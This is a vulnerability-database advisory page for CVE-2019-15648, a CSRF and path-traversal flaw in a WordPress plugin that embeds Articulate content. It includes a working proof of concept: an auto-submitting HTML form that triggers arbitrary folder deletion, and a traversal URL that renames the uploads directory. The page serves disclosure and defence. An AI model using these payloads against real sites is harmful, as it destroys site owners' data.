Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWPScanTeamWPEX-ID:B2B405AC-88B4-4201-BDC3-9D5842DB2AC5
HistoryJul 02, 2019 - 12:00 a.m.

Insert or Embed Articulate Content into WordPress <= 4.2999 - Authenticated Arbitrary Folder Deletion and Rename

2019-07-0200:00:00
WPScanTeam
11

0.001 Low

EPSS

Percentile

22.8%

JSON

The lack of CSRF, Authorisation and Path Traversal checks in wp_ajax_del_dir() and wp_ajax_rename_dir() AJAX methods in functions.php make it possible for an authenticated user with a role as low as subscriber to delete and rename arbitrary folders. CSRF attacks against such authenticated users is also possible, in order to make them perform those malicious actions.

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="del_dir" />
      <input type="hidden" name="dir" value="" />
    </form>
  </body>
</html>

The dir parameter can be changed, for example using '../' will delete the content of wp-content/uploads.

To rename and move wp-content/uploads/articulate_uploads to wp-content/yolo:

https://<BLOG>/wp-admin/admin-ajax.php?action=rename_dir&dir_name=/&title=../../yolo/

Related

prion 1
nvd 1
cvelist 1
cve 1
wpvulndb 1
prion
prion
Design/Logic Flaw
2019-08-27 12:15:00
nvd
nvd
CVE-2019-15648
2019-08-27 12:15:13
cvelist
cvelist
CVE-2019-15648
2019-08-27 11:44:46
cve
cve
CVE-2019-15648
2019-08-27 12:15:13
wpvulndb
wpvulndb
Insert or Embed Articulate Content into WordPress <= 4.2999 - Authenticated Arbitrary Folder Deletion and Rename
2019-07-02 00:00:00

0.001 Low

EPSS

Percentile

22.8%

JSON
Related for WPEX-ID:B2B405AC-88B4-4201-BDC3-9D5842DB2AC5
prion1nvd1cvelist1cve1wpvulndb1